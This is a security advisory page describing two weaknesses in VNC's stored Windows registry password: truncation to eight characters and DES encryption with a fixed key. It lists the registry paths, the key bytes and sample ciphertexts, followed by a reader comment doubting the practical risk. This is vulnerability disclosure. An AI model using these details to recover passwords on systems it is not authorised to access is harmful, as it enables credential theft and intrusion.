|
Brought to you by:
Suppliers of:
|
|
|
| |
| VNC is a free software package that permits users to view a remote desktop in real-time. In order to protect from intrusions, VNC is password protection. This encryption is done using DES, which is an extremely strong encryption scheme, but the way VNC does the encryption is rather poor and can be easily decrypted by anyone with read access to the registry. |
| |
Credit:
The information has been provided by: Conde Vampiro.
|
| |
The software contains two vulnerabilities:
1) Fixed password length (up to 8 characters).
2) Fixed encryption key.
1) Fixed password length.
When we install the VNC server on a Windows box, we can find the encrypted password at the following registry keys (look for "password"):
\HKEY_CURRENT_USER\Software\ORL\WinVNC3
\HKEY_USERS\.DEFAULT\SOftware\ORL\WinVNC3
When we introduce a password of arbitrary length, the VNC server will encrypt our password, but it will drop (nullify) all bytes after the 8th one. This is demonstrated here:
Input password -> micasaesazul
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> 1f f1 6f 1a cc 34 64 f0
Input password -> micasaesroja
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> 1f f1 6f 1a cc 34 64 f0
In both cases, the VNC server interpreted the password as "micasaes." an eight characters password is usually too small.
2) Fixed encryption key.
When the VNC server encrypts a password it always uses the same fixed key, so the output password are always the same. For example, if we input "conde" as password, the output password is: df 6b 7e e8 94 26 d8 b5. Since the software is open source, the key is publicly available, making the encryption pointless.
Input password -> conde
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> df 6b 7e e8 94 26 d8 b5
Input password -> 2621
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> 73 05 1d 22 49 b6 05 1c
The VNC server always uses this key ("23 82 107 6 35 78 88 7") in the current version. This mean that an attacker with read access to the registry can simply decode the password and obtain the plain-text version of it.
|
| Subject:
|
so what |
Date: |
26 Jan. 2007 |
| From: |
user |
| If you've got access to the registry you're already on the system so isn't getting access to VNC a bit academic at that point? From my understanding the registry password encryption is not meant to be algorithmically secure and isn't advertized as such. If you wanted algorithmic security you'd have to have a person at the local console type in the key every time the VNC service started. That isn't realistic, and isn't really useful since you're only protecting yourself from people who already have access to the system. |
|
|
|
|
|
|
